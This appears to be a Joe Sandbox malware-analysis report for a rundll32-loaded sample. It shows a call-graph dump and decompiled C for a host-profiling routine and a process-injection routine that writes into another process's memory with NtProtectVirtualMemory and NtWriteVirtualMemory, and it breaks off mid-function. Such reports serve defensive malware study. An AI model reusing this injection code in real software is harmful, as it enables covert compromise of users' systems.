12203->12204 12205 41b1226 12204->12205 12206 41b9d66 2 API calls 12205->12206 12208 
41b1232 12206->12208 12207 41b1249 12210 41b913b 2 API calls 12207->12210 12208->12207 12429 41bb3b2 12208->12429 12211 41b125d 12210->12211 12213 41b1276 12211->12213 12442 41b278b 12211->12442 12214 41b127a 12213->12214 12447 41b1d6a 12213->12447 12487 41bb3cb 12214->12487 12218 41bb3cb 2 API calls 12219 41b1295 12218->12219 12219->11768 12221 41b90ea 2 API calls 12220->12221 12222 41c1367 12221->12222 12923 41bcc6f memset 12222->12923 12225 41b9d66 2 API calls 12226 41c138d 12225->12226 12240 41c1406 12226->12240 12935 41bad63 12226->12935 12229 41b911f RtlAllocateHeap 12230 41c13b8 12229->12230 12231 41b16ec 2 API calls 12230->12231 12230->12240 12232 41c13ca 12231->12232 12233 41bc08e 2 API calls 12232->12233 12234 41c13d9 12233->12234 12235 41bc3af 2 API calls 12234->12235 12236 41c13ec 12235->12236 12237 41c13fa 12236->12237 12938 41bb1cd 12236->12938 12239 41b913b 2 API calls 12237->12239 12239->12240 12240->11769 12242 41b118a 12241->12242 12949 41b224b 12242->12949 12246 41b911f RtlAllocateHeap 12245->12246 12247 41baa51 12246->12247 12248 41b1322 12247->12248 12284 41bce94 12247->12284 12248->11757 12248->12143 12251 41b90ca 2 API calls 12252 41baa91 12251->12252 12253 41babd0 12252->12253 12258 41baabe 12252->12258 12254 41babe2 12253->12254 12255 41bac21 12253->12255 12257 41babcc 12254->12257 12259 41b98d1 2 API calls 12254->12259 12256 41b98d1 2 API calls 12255->12256 12256->12257 12260 41b9d4c 2 API calls 12257->12260 12258->12257 12294 41b98d1 12258->12294 12259->12257 12263 41bac42 12260->12263 12262 41b913b 2 API calls 12264 41bacd9 12262->12264 12263->12262 12273 41bac9e 12263->12273 12265 41b92a2 memset 12264->12265 12265->12273 12267 41b90ea 2 API calls 12268 41bab24 12267->12268 12270 41b9924 2 API calls 12268->12270 12269 41b913b 2 API calls 12269->12248 12272 41bab36 12270->12272 12271 41b98d1 2 API calls 12276 41babad 12271->12276 12274 41b9d66 2 API calls 12272->12274 12273->12269 12275 41bab44 12274->12275 12300 41b97fa 12275->12300 
12278 41b913b 2 API calls 12276->12278 12278->12257 12279 41b913b 2 API calls 12281 41bab7b 12279->12281 12282 41b913b 2 API calls 12281->12282 12283 41bab86 12282->12283 12283->12271 12285 41bcead 12284->12285 12286 41c4b56 2 API calls 12285->12286 12287 41bcebd 12286->12287 12288 41b90ca 2 API calls 12287->12288 12290 41bcecc 12288->12290 12289 41bcf08 12291 41b9d4c 2 API calls 12289->12291 12290->12289 12292 41c4b56 2 API calls 12290->12292 12293 41baa72 12291->12293 12292->12290 12293->12251 12295 41b98e3 12294->12295 12296 41b911f RtlAllocateHeap 12295->12296 12297 41b9900 12296->12297 12298 41b991d 12297->12298 12299 41b990c lstrcatA 12297->12299 12298->12263 12298->12267 12298->12283 12299->12297 12301 41b9803 12300->12301 12302 41b9830 12300->12302 12303 41b911f RtlAllocateHeap 12301->12303 12302->12279 12304 41b9815 12303->12304 12304->12302 12305 41b981d MultiByteToWideChar 12304->12305 12305->12302 12307 41be775 12306->12307 12308 41be76e 12306->12308 12307->12308 12309 41be79f 12307->12309 12310 41b911f RtlAllocateHeap 12307->12310 12308->12149 12308->12159 12309->12308 12311 41b913b 2 API calls 12309->12311 12310->12309 12311->12308 12313 41b974e 12312->12313 12315 41b9769 12312->12315 12314 41b911f RtlAllocateHeap 12313->12314 12314->12315 12315->12156 12317 41be943 12316->12317 12320 41c0d51 12317->12320 12321 41c0d6a 12320->12321 12322 41c0d8b lstrlenW 12321->12322 12323 41be955 12322->12323 12323->12155 12327 41badf7 12324->12327 12332 41baf17 12327->12332 12330 41b1335 12330->12163 12331 41b913b 2 API calls 12331->12330 12333 41baf39 12332->12333 12346 41ba9c7 12333->12346 12335 41baf43 12339 41bae10 12335->12339 12349 41bffca 12335->12349 12337 41baf77 12340 41c0d51 lstrlenW 12337->12340 12345 41bb010 12337->12345 12338 41b913b 2 API calls 12338->12339 12339->12330 12339->12331 12341 41bafc8 12340->12341 12342 41bafeb 12341->12342 12344 41b918a RtlAllocateHeap 12341->12344 12343 41b913b 2 API calls 12342->12343 12343->12345 12344->12342 
12345->12338 12347 41b911f RtlAllocateHeap 12346->12347 12348 41ba9d3 12347->12348 12348->12335 12350 41bfff0 12349->12350 12351 41b911f RtlAllocateHeap 12350->12351 12352 41bfff4 12350->12352 12351->12352 12352->12337 12354 41badd2 12353->12354 12355 41baf17 4 API calls 12354->12355 12356 41b1470 12355->12356 12356->12168 12356->12171 12358 41be899 12357->12358 12361 41be894 12357->12361 12359 41be8bb GetLastError 12358->12359 12360 41be8b0 GetLastError 12358->12360 12359->12361 12360->12361 12361->12179 12378 41baed3 12362->12378 12365 41ba087 SetFileAttributesW 12366 41b92a2 memset 12365->12366 12367 41ba0b4 12366->12367 12368 41ba0d5 12367->12368 12369 41c4b56 2 API calls 12367->12369 12368->12190 12370 41ba0f1 12369->12370 12371 41bc08e 2 API calls 12370->12371 12372 41ba102 12371->12372 12373 41b9924 2 API calls 12372->12373 12374 41ba113 12373->12374 12374->12368 12398 41b9fb4 12374->12398 12377 41b913b 2 API calls 12377->12368 12379 41baee3 12378->12379 12382 41bb044 12379->12382 12383 41bb061 12382->12383 12395 41b12db 12382->12395 12384 41c4b56 2 API calls 12383->12384 12383->12395 12385 41bb0a5 12384->12385 12386 41b911f RtlAllocateHeap 12385->12386 12387 41bb0b9 12386->12387 12388 41c49fc 2 API calls 12387->12388 12387->12395 12389 41bb0fb 12388->12389 12390 41c0d51 lstrlenW 12389->12390 12391 41bb13c 12390->12391 12392 41ba9c7 RtlAllocateHeap 12391->12392 12396 41bb148 12392->12396 12393 41bb1b2 12394 41b913b 2 API calls 12393->12394 12394->12395 12395->12190 12395->12365 12396->12393 12397 41b913b 2 API calls 12396->12397 12397->12393 12399 41b9fd7 12398->12399 12400 41b9fdf memset 12399->12400 12409 41ba04e 12399->12409 12401 41b90ea 2 API calls 12400->12401 12402 41b9ffb 12401->12402 12403 41c4b56 2 API calls 12402->12403 12404 41ba017 12403->12404 12405 41bc08e 2 API calls 12404->12405 12406 41ba02d 12405->12406 12407 41b9d66 2 API calls 12406->12407 12408 41ba036 MoveFileW 12407->12408 12408->12409 12409->12377 12495 41b16d2 12410->12495 12415 
41b9d4c 2 API calls 12416 41b28c2 12415->12416 12417 41b1205 12416->12417 12418 41b16d2 2 API calls 12416->12418 12417->12202 12419 41b28d1 12418->12419 12508 41bf865 12419->12508 12422 41b9d4c 2 API calls 12423 41b28ee 12422->12423 12423->12417 12516 41bb39c 12423->12516 12425 41b290b 12529 41bfc17 12425->12529 12428 41b913b 2 API calls 12428->12417 12601 41bf8c4 12429->12601 12431 41bb3c3 12431->12207 12432 41bb2da 12432->12431 12433 41bf9e7 3 API calls 12432->12433 12434 41bb2ed 12433->12434 12435 41b911f RtlAllocateHeap 12434->12435 12439 41bb2f4 12435->12439 12436 41bb395 12436->12207 12437 41bb38d 12438 41bfc17 6 API calls 12437->12438 12438->12436 12439->12436 12439->12437 12440 41b91b9 3 API calls 12439->12440 12441 41b9743 RtlAllocateHeap 12439->12441 12440->12439 12441->12439 12443 41b27ff 12442->12443 12444 41b911f RtlAllocateHeap 12443->12444 12445 41b913b 2 API calls 12443->12445 12446 41b287e 12443->12446 12444->12443 12445->12443 12446->12213 12448 41bd130 8 API calls 12447->12448 12449 41b1d82 12448->12449 12450 41bbfab 7 API calls 12449->12450 12451 41b1d8e 12450->12451 12620 41be83c 12451->12620 12453 41b1d9a 12454 41b9491 8 API calls 12453->12454 12479 41b1da3 12453->12479 12455 41b1dbd 12454->12455 12625 41b1b39 memset 12455->12625 12458 41b92a2 memset 12460 41b1e1c 12458->12460 12459 41b1f7c 12461 41b90ea 2 API calls 12459->12461 12667 41be521 12460->12667 12463 41b1f86 12461->12463 12464 41b9924 2 API calls 12463->12464 12468 41b1f9d 12464->12468 12465 41b1fcd 12467 41b9d66 2 API calls 12465->12467 12471 41b1fd9 12467->12471 12468->12465 12470 41b913b 2 API calls 12468->12470 12469 41b1e9e 12472 41b911f RtlAllocateHeap 12469->12472 12470->12465 12474 41b913b 2 API calls 12471->12474 12473 41b1efa 12472->12473 12476 41b90ea 2 API calls 12473->12476 12473->12479 12475 41b2034 12474->12475 12477 41b913b 2 API calls 12475->12477 12478 41b1f13 12476->12478 12477->12479 12480 41bc08e 2 API calls 12478->12480 12479->12214 12481 41b1f48 12480->12481 
12482 41b9d66 2 API calls 12481->12482 12483 41b1f52 12482->12483 12672 41bc3af 12483->12672 12486 41b913b 2 API calls 12486->12479 12488 41bb3da 12487->12488 12489 41b128d 12487->12489 12490 41bb3ff 12488->12490 12492 41b913b 2 API calls 12488->12492 12489->12218 12491 41b913b 2 API calls 12490->12491 12493 41bb40a 12491->12493 12492->12488 12494 41b913b 2 API calls 12493->12494 12494->12489 12496 41b9bf7 2 API calls 12495->12496 12497 41b16e8 12496->12497 12498 41bfeca 12497->12498 12499 41b97fa 2 API calls 12498->12499 12503 41bfef4 12499->12503 12500 41c4b56 2 API calls 12501 41bff19 FindResourceW 12500->12501 12502 41bff51 12501->12502 12501->12503 12504 41b913b 2 API calls 12502->12504 12503->12500 12503->12502 12505 41bff81 12504->12505 12506 41b918a RtlAllocateHeap 12505->12506 12507 41b28b1 12505->12507 12506->12507 12507->12415 12509 41b28e0 12508->12509 12510 41bf874 12508->12510 12509->12422 12511 41b911f RtlAllocateHeap 12510->12511 12512 41bf87e 12511->12512 12512->12509 12541 41bf76a 12512->12541 12515 41b913b 2 API calls 12515->12509 12517 41bf865 4 API calls 12516->12517 12518 41bb2da 12517->12518 12519 41bb3aa 12518->12519 12579 41bf9e7 12518->12579 12519->12425 12522 41b911f RtlAllocateHeap 12526 41bb2f4 12522->12526 12523 41bb395 12523->12425 12524 41bb38d 12525 41bfc17 6 API calls 12524->12525 12525->12523 12526->12523 12526->12524 12527 41b91b9 3 API calls 12526->12527 12528 41b9743 RtlAllocateHeap 12526->12528 12527->12526 12528->12526 12530 41bfc26 12529->12530 12540 41b2916 12529->12540 12531 41bfc60 12530->12531 12535 41b913b 2 API calls 12530->12535 12530->12540 12532 41bfc70 12531->12532 12584 41bfd3e 12531->12584 12534 41bfc8b 12532->12534 12536 41b913b 2 API calls 12532->12536 12537 41bfca1 12534->12537 12538 41b913b 2 API calls 12534->12538 12535->12530 12536->12534 12539 41b913b 2 API calls 12537->12539 12538->12537 12539->12540 12540->12428 12542 41b911f RtlAllocateHeap 12541->12542 12543 41bf77f 12542->12543 12546 41bf7a7 
12543->12546 12550 41bf78c 12543->12550 12555 41bfcbd 12543->12555 12544 41bf82b 12549 41b913b 2 API calls 12544->12549 12544->12550 12546->12544 12547 41bf7f5 12546->12547 12548 41bfcbd lstrlenW 12546->12548 12547->12544 12547->12550 12559 41c0668 12547->12559 12548->12547 12549->12550 12550->12509 12550->12515 12553 41bf845 12554 41b913b 2 API calls 12553->12554 12554->12550 12556 41bfcdd 12555->12556 12557 41c0d51 lstrlenW 12556->12557 12558 41bfd01 12557->12558 12558->12546 12560 41b911f RtlAllocateHeap 12559->12560 12562 41c068c 12560->12562 12561 41c07fb 12563 41b913b 2 API calls 12561->12563 12562->12561 12564 41b911f RtlAllocateHeap 12562->12564 12565 41c0821 12563->12565 12566 41c06ac 12564->12566 12567 41b913b 2 API calls 12565->12567 12566->12561 12570 41b911f RtlAllocateHeap 12566->12570 12568 41c082f 12567->12568 12569 41bf824 12568->12569 12571 41b913b 2 API calls 12568->12571 12569->12544 12569->12553 12572 41c06c0 12570->12572 12571->12569 12572->12561 12574 41b91b9 12572->12574 12575 41b911f RtlAllocateHeap 12574->12575 12576 41b91ce 12575->12576 12577 41b913b 2 API calls 12576->12577 12578 41b91f6 12576->12578 12577->12578 12578->12572 12582 41bfa0a 12579->12582 12580 41b911f RtlAllocateHeap 12580->12582 12581 41bb2ed 12581->12522 12582->12580 12582->12581 12583 41b913b 2 API calls 12582->12583 12583->12582 12585 41b911f RtlAllocateHeap 12584->12585 12587 41bfd77 12585->12587 12586 41bfd81 12586->12532 12587->12586 12588 41bfdaa 12587->12588 12590 41bfe28 12587->12590 12596 41bf6f0 12588->12596 12591 41c0d51 lstrlenW 12590->12591 12594 41bfe20 12591->12594 12592 41bfdb6 12593 41c0d51 lstrlenW 12592->12593 12593->12594 12595 41b913b 2 API calls 12594->12595 12595->12586 12597 41c4b56 2 API calls 12596->12597 12598 41bf709 12597->12598 12599 41bf736 12598->12599 12600 41c4b56 2 API calls 12598->12600 12599->12592 12600->12598 12602 41b911f RtlAllocateHeap 12601->12602 12603 41bf8e5 12602->12603 12604 41bf96b 12603->12604 12605 41bf91d 12603->12605 
12610 41bf8ef 12603->12610 12606 41b911f RtlAllocateHeap 12604->12606 12607 41be75d 3 API calls 12605->12607 12608 41bf976 12606->12608 12609 41bf927 12607->12609 12608->12610 12611 41bf990 12608->12611 12613 41b913b 2 API calls 12608->12613 12609->12611 12612 41bf76a 4 API calls 12609->12612 12610->12432 12615 41bf9b8 12611->12615 12618 41b913b 2 API calls 12611->12618 12614 41bf941 12612->12614 12613->12611 12614->12608 12617 41bf947 12614->12617 12616 41b913b 2 API calls 12615->12616 12616->12610 12619 41b913b 2 API calls 12617->12619 12618->12615 12619->12610 12621 41be850 12620->12621 12622 41be860 GetLastError 12621->12622 12623 41be856 GetLastError 12621->12623 12624 41be86d 12622->12624 12623->12624 12624->12453 12626 41b1b6c 12625->12626 12627 41b1b9f 12626->12627 12679 41b2aec 12626->12679 12629 41bd130 8 API calls 12627->12629 12633 41b1bd3 12627->12633 12630 41b1bb1 12629->12630 12631 41bcf1d 6 API calls 12630->12631 12632 41b1bc1 12631->12632 12634 41b1bcf 12632->12634 12695 41b1ad7 12632->12695 12633->12458 12633->12459 12634->12633 12703 41b1a7a 12634->12703 12637 41b1be4 12638 41bd146 6 API calls 12637->12638 12639 41b1c0c 12638->12639 12714 41b2bd3 12639->12714 12642 41b9924 2 API calls 12643 41b1c3a 12642->12643 12644 41b1c5c 12643->12644 12646 41b9787 RtlAllocateHeap 12643->12646 12645 41baa27 10 API calls 12644->12645 12648 41b1c7b 12645->12648 12647 41b1c4e 12646->12647 12649 41b9787 RtlAllocateHeap 12647->12649 12648->12633 12748 41bae9a 12648->12748 12649->12644 12652 41baed3 6 API calls 12653 41b1ca4 12652->12653 12752 41bae75 12653->12752 12656 41b1cc6 12657 41b1cd7 12656->12657 12659 41bb41a 7 API calls 12656->12659 12762 41bc2d1 GetSystemTimeAsFileTime 12657->12762 12659->12657 12661 41b1cde 12764 41bae47 12661->12764 12665 41b1d06 12665->12633 12779 41bcae4 12665->12779 12919 41be42e 12667->12919 12670 41b1e4d 12670->12459 12670->12469 12671 41be42e RtlAllocateHeap 12671->12670 12673 41b92a2 memset 12672->12673 12674 41bc3c7 12673->12674 

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 77%
                                                                      			E041BBB4D(void* __edx, void* __fp0) {
                                                                      				char _v8;
                                                                      				char _v12;
                                                                      				char _v16;
                                                                      				char _v144;
                                                                      				char _v656;
                                                                      				char _v668;
                                                                      				char _v2644;
                                                                      				void* __esi;
                                                                      				struct _OSVERSIONINFOA* _t70;
                                                                      				intOrPtr _t72;
                                                                      				void* _t73;
                                                                      				intOrPtr _t75;
                                                                      				intOrPtr _t77;
                                                                      				intOrPtr* _t79;
                                                                      				intOrPtr _t81;
                                                                      				intOrPtr _t82;
                                                                      				intOrPtr _t83;
                                                                      				intOrPtr _t89;
                                                                      				intOrPtr _t91;
                                                                      				void* _t92;
                                                                      				intOrPtr _t94;
                                                                      				intOrPtr _t95;
                                                                      				void* _t96;
                                                                      				void* _t100;
                                                                      				intOrPtr _t102;
                                                                      				intOrPtr _t104;
                                                                      				short _t109;
                                                                      				char _t111;
                                                                      				intOrPtr _t116;
                                                                      				intOrPtr _t119;
                                                                      				intOrPtr _t122;
                                                                      				intOrPtr _t126;
                                                                      				intOrPtr _t137;
                                                                      				intOrPtr _t139;
                                                                      				intOrPtr _t141;
                                                                      				intOrPtr _t144;
                                                                      				intOrPtr _t146;
                                                                      				intOrPtr _t152;
                                                                      				void* _t153;
                                                                      				WCHAR* _t154;
                                                                      				char* _t155;
                                                                      				intOrPtr _t166;
                                                                      				intOrPtr _t182;
                                                                      				void* _t198;
                                                                      				struct _OSVERSIONINFOA* _t199;
                                                                      				void* _t200;
                                                                      				void* _t202;
                                                                      				char _t205;
                                                                      				void* _t206;
                                                                      				char* _t207;
                                                                      				void* _t210;
                                                                      				int* _t211;
                                                                      				void* _t224;
                                                                      
                                                                      				_t224 = __fp0;
                                                                      				_t152 =  *0x41d0fa8; // 0x41b0000
                                                                      				_t70 = E041B911F(0x1ac4);
                                                                      				_t199 = _t70;
                                                                      				if(_t199 != 0) {
                                                                      					 *((intOrPtr*)(_t199 + 0x1640)) = GetCurrentProcessId();
                                                                      					_t72 =  *0x41d0fa0; // 0x439f8a0
                                                                      					_t73 =  *((intOrPtr*)(_t72 + 0xb0))(_t200);
                                                                      					_t3 = _t199 + 0x648; // 0x648
                                                                      					E041C4A2A( *((intOrPtr*)(_t199 + 0x1640)) + _t73, _t3);
                                                                      					_t75 =  *0x41d0fa0; // 0x439f8a0
                                                                      					_t5 = _t199 + 0x1644; // 0x1644
                                                                      					_t201 = _t5;
                                                                      					_push(0x105);
                                                                      					_push(_t5);
                                                                      					_push(0);
                                                                      					if( *((intOrPtr*)(_t75 + 0x12c))() != 0) {
                                                                      						 *((intOrPtr*)(_t199 + 0x1854)) = E041B9547(_t201);
                                                                      					}
                                                                      					_t77 =  *0x41d0fa0; // 0x439f8a0
                                                                      					_t79 = E041BDC33( *((intOrPtr*)(_t77 + 0x130))()); // executed
                                                                      					 *((intOrPtr*)(_t199 + 0x110)) = _t79;
                                                                      					_t163 =  *_t79;
                                                                      					if(E041BDDAE( *_t79) == 0) {
                                                                      						_t81 = E041BDC83(_t163, _t201); // executed
                                                                      						__eflags = _t81;
                                                                      						_t166 = (0 | _t81 > 0x00000000) + 1;
                                                                      						__eflags = _t166;
                                                                      						 *((intOrPtr*)(_t199 + 0x214)) = _t166;
                                                                      					} else {
                                                                      						 *((intOrPtr*)(_t199 + 0x214)) = 3;
                                                                      					}
                                                                      					_t14 = _t199 + 0x220; // 0x220, executed
                                                                      					_t82 = E041BE5A6(_t14); // executed
                                                                      					 *((intOrPtr*)(_t199 + 0x218)) = _t82;
                                                                      					_t83 = E041BE56B(_t14); // executed
                                                                      					 *((intOrPtr*)(_t199 + 0x21c)) = _t83;
                                                                      					_t17 = _t199 + 0x114; // 0x114
                                                                      					_t202 = _t17;
                                                                      					 *((intOrPtr*)(_t199 + 0x224)) = _t152;
                                                                      					_push( &_v16);
                                                                      					_v12 = 0x80;
                                                                      					_push( &_v8);
                                                                      					_v8 = 0x100;
                                                                      					_push( &_v656);
                                                                      					_push( &_v12);
                                                                      					_push(_t202);
                                                                      					_push( *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x110)))));
                                                                      					_t89 =  *0x41d0fc8; // 0x439fb00
                                                                      					_push(0); // executed
                                                                      					if( *((intOrPtr*)(_t89 + 0x6c))() == 0) {
                                                                      						GetLastError();
                                                                      					}
                                                                      					_t91 =  *0x41d0fc0; // 0x439fa38
                                                                      					_t92 =  *((intOrPtr*)(_t91 + 0x3c))(0x1000);
                                                                      					_t28 = _t199 + 0x228; // 0x228
                                                                      					_t153 = _t28;
                                                                      					 *(_t199 + 0x1850) = 0 | _t92 > 0x00000000;
                                                                      					if( *0x41d0fa4 != 2) {
                                                                      						E041BBA56( *((intOrPtr*)(_t199 + 0x224)), _t153);
                                                                      					} else {
                                                                      						E041BBB20(_t153);
                                                                      					}
                                                                      					_t94 =  *0x41d0fa4; // 0x1
                                                                      					 *((intOrPtr*)(_t199 + 0xa0)) = _t94;
                                                                      					_t219 = _t153;
                                                                      					if(_t153 != 0) {
                                                                      						 *((intOrPtr*)(_t199 + 0x434)) = E041B9547(_t153);
                                                                      					}
                                                                      					_t95 = E041BD130();
                                                                      					_t35 = _t199 + 0xb0; // 0xb0
                                                                      					_t203 = _t35;
                                                                      					 *((intOrPtr*)(_t199 + 0xac)) = _t95;
                                                                      					_t96 = E041BCF1D(_t35, _t219, _t224);
                                                                      					_t37 = _t199 + 0xd0; // 0xd0
                                                                      					E041B98A9(_t96, _t35, _t37);
                                                                      					_t38 = _t199 + 0x438; // 0x438
                                                                      					E041B955E(_t153, _t38);
                                                                      					_t100 = E041BE605(_t203, E041BCE25(_t35), 0);
                                                                      					_t39 = _t199 + 0x100c; // 0x100c
                                                                      					E041BD146(_t100, _t39, _t224);
                                                                      					_t102 =  *0x41d0fa0; // 0x439f8a0
                                                                      					_t104 = E041BDE00( *((intOrPtr*)(_t102 + 0x130))(_t202)); // executed
                                                                      					 *((intOrPtr*)(_t199 + 0x101c)) = _t104;
                                                                      					E041B92A2(_t199, 0, 0x9c);
                                                                      					_t211 = _t210 + 0xc;
                                                                      					_t199->dwOSVersionInfoSize = 0x9c;
                                                                      					GetVersionExA(_t199);
                                                                      					 *((intOrPtr*)(_t199 + 0xa8)) = E041BB85A(_t103);
                                                                      					_t109 = E041BB883(_t108);
                                                                      					_t43 = _t199 + 0x1020; // 0x1020
                                                                      					_t154 = _t43;
                                                                      					 *((short*)(_t199 + 0x9c)) = _t109;
                                                                      					GetWindowsDirectoryW(_t154, 0x104);
                                                                      					_t111 = E041B90EA(_t108, 0x83);
                                                                      					_t182 =  *0x41d0fa0; // 0x439f8a0
                                                                      					_t205 = _t111;
                                                                      					 *_t211 = 0x104;
                                                                      					_push( &_v668);
                                                                      					_push(_t205);
                                                                      					_v8 = _t205;
                                                                      					if( *((intOrPtr*)(_t182 + 0xf0))() == 0) {
                                                                      						_t146 =  *0x41d0fa0; // 0x439f8a0
                                                                      						 *((intOrPtr*)(_t146 + 0x10c))(_t205, _t154);
                                                                      					}
                                                                      					E041B9D66( &_v8);
                                                                      					_t116 =  *0x41d0fa0; // 0x439f8a0
                                                                      					_t50 = _t199 + 0x1434; // 0x1434
                                                                      					_t206 = _t50;
                                                                      					 *_t211 = 0x209;
                                                                      					_push(_t206);
                                                                      					_push(L"USERPROFILE");
                                                                      					if( *((intOrPtr*)(_t116 + 0xf0))() == 0) {
                                                                      						E041BC08E(_t206, 0x105, L"%s\\%s", _t154);
                                                                      						_t144 =  *0x41d0fa0; // 0x439f8a0
                                                                      						_t211 =  &(_t211[5]);
                                                                      						 *((intOrPtr*)(_t144 + 0x10c))(L"USERPROFILE", _t206, "TEMP");
                                                                      					}
                                                                      					_push(0x20a);
                                                                      					_t53 = _t199 + 0x122a; // 0x122a
                                                                      					_t155 = L"TEMP";
                                                                      					_t119 =  *0x41d0fa0; // 0x439f8a0
                                                                      					_push(_t155);
                                                                      					if( *((intOrPtr*)(_t119 + 0xf0))() == 0) {
                                                                      						_t141 =  *0x41d0fa0; // 0x439f8a0
                                                                      						 *((intOrPtr*)(_t141 + 0x10c))(_t155, _t206);
                                                                      					}
                                                                      					_push(0x40);
                                                                      					_t207 = L"SystemDrive";
                                                                      					_push( &_v144);
                                                                      					_t122 =  *0x41d0fa0; // 0x439f8a0
                                                                      					_push(_t207);
                                                                      					if( *((intOrPtr*)(_t122 + 0xf0))() == 0) {
                                                                      						_t139 =  *0x41d0fa0; // 0x439f8a0
                                                                      						 *((intOrPtr*)(_t139 + 0x10c))(_t207, L"C:");
                                                                      					}
                                                                      					_v8 = 0x7f;
                                                                      					_t61 = _t199 + 0x199c; // 0x199c
                                                                      					_t126 =  *0x41d0fa0; // 0x439f8a0
                                                                      					 *((intOrPtr*)(_t126 + 0xc0))(_t61,  &_v8);
                                                                      					_t64 = _t199 + 0x100c; // 0x100c
                                                                      					E041C4A2A(E041BE605(_t64, E041BCE25(_t64), 0),  &_v2644);
                                                                      					_t65 = _t199 + 0x1858; // 0x1858
                                                                      					E041C49FC( &_v2644, _t65, 0x20);
                                                                      					_push( &_v2644);
                                                                      					_push(0x1e);
                                                                      					_t68 = _t199 + 0x1878; // 0x1878
                                                                      					_t198 = 0x14;
                                                                      					E041B962B(_t68, _t198);
                                                                      					_t137 = E041BB501(_t68, _t198); // executed
                                                                      					 *((intOrPtr*)(_t199 + 0x1898)) = _t137;
                                                                      					return _t199;
                                                                      				}
                                                                      				return _t70;
                                                                      			}

                                                                      APIs
                                                                      • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 041BBB74
                                                                      • GetLastError.KERNEL32(?,?,00000000), ref: 041BBC6E
                                                                      • GetVersionExA.KERNEL32(00000000,?,?,00000000), ref: 041BBD56
                                                                        • Part of subcall function 041BDC83: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,041B0000), ref: 041BDD27
                                                                      • GetWindowsDirectoryW.KERNEL32(00001020,00000104,?,?,00000000), ref: 041BBD81
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeCloseCurrentDirectoryErrorFindLastNotificationProcessVersionWindows
                                                                      • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                      • API String ID: 3040727122-2706916422
                                                                      • Opcode ID: e8f246cfe19cea86165f1b1fd16d51cdb922dbc18f0847f06641af39c55265c4
                                                                      • Instruction ID: c22a8391e2b6536525f2420da00a6ef96ea46f04550ee5c18377193e4ecea3db
                                                                      • Opcode Fuzzy Hash: e8f246cfe19cea86165f1b1fd16d51cdb922dbc18f0847f06641af39c55265c4
                                                                      • Instruction Fuzzy Hash: 0FA18D71701605AFE708EF71D888BEEBBA8FF08308F004169E59997241EB74BA45CBD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 144 41ba823-41ba842 145 41ba850 144->145 146 41ba844-41ba84e call 41ba222 144->146 148 41ba855-41ba857 145->148 146->148 150 41ba859-41ba85e 148->150 151 41ba863-41ba871 call 41ba412 148->151 150->151 154 41ba923-41ba928 call 41ba356 151->154 155 41ba877-41ba8ae call 41b92a2 GetThreadContext 151->155 160 41ba92a-41ba92e 154->160 155->154 161 41ba8b0-41ba8c5 155->161 162 41ba8d7-41ba8db 161->162 163 41ba8c7-41ba8d5 161->163 164 41ba94e-41ba950 162->164 165 41ba8dd-41ba8e2 162->165 166 41ba8e3-41ba91f NtProtectVirtualMemory NtWriteVirtualMemory 163->166 164->160 165->166 167 41ba92f-41ba94c NtProtectVirtualMemory 166->167 168 41ba921 166->168 167->154 168->154
                                                                      C-Code - Quality: 100%
                                                                      			E041BA823(void* __ecx, void** __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                      				long _v8;
                                                                      				intOrPtr _v15;
                                                                      				void _v16;
                                                                      				long _v20;
                                                                      				void* _v24;
                                                                      				long _v28;
                                                                      				void* _v32;
                                                                      				struct _CONTEXT _v748;
                                                                      				intOrPtr _t37;
                                                                      				intOrPtr _t38;
                                                                      				void* _t39;
                                                                      				void* _t41;
                                                                      				void _t49;
                                                                      				intOrPtr _t66;
                                                                      				void* _t68;
                                                                      				long _t70;
                                                                      				void* _t73;
                                                                      				void** _t77;
                                                                      				void* _t80;
                                                                      
                                                                      				_t37 =  *0x41d0fd8; // 0x439fc50
                                                                      				_t77 = __edx;
                                                                      				_t68 = __ecx;
                                                                      				if(( *(_t37 + 0x1898) & 0x00fe0286) == 0) {
                                                                      					_t38 =  *0x41d10b0;
                                                                      				} else {
                                                                      					_t38 = E041BA222(__ecx, __edx);
                                                                      					 *0x41d10b0 = _t38;
                                                                      				}
                                                                      				if(_t38 == 0) {
                                                                      					_t66 =  *0x41d0fe4; // 0x439f9f0
                                                                      					 *0x41d10b0 = _t66;
                                                                      				}
                                                                      				_t39 = E041BA412( *_t77, _a4); // executed
                                                                      				_t80 = _t39;
                                                                      				if(_t80 == 0) {
                                                                      					L13:
                                                                      					E041BA356();
                                                                      					_t41 = _t80;
                                                                      					goto L14;
                                                                      				} else {
                                                                      					E041B92A2( &_v748, 0, 0x2cc);
                                                                      					_v748.ContextFlags = 0x10002;
                                                                      					if(GetThreadContext(_t77[1],  &_v748) == 0) {
                                                                      						goto L13;
                                                                      					}
                                                                      					_v20 = _v20 & 0x00000000;
                                                                      					_t73 = _v748.Eax;
                                                                      					_t49 = _t80 - _a4 + _t68;
                                                                      					if(_a8 != 1) {
                                                                      						if(_a8 != 2) {
                                                                      							_t41 = 0;
                                                                      							L14:
                                                                      							return _t41;
                                                                      						}
                                                                      						_v16 = _t49;
                                                                      						_t70 = 8;
                                                                      						L11:
                                                                      						_v32 = _t73;
                                                                      						_v24 = _t73;
                                                                      						_v8 = _t70;
                                                                      						NtProtectVirtualMemory( *_t77,  &_v24,  &_v8, 4,  &_v20);
                                                                      						if(NtWriteVirtualMemory( *_t77, _v748.Eax,  &_v16, _t70,  &_v8) >= 0) {
                                                                      							_v28 = _v28 & 0x00000000;
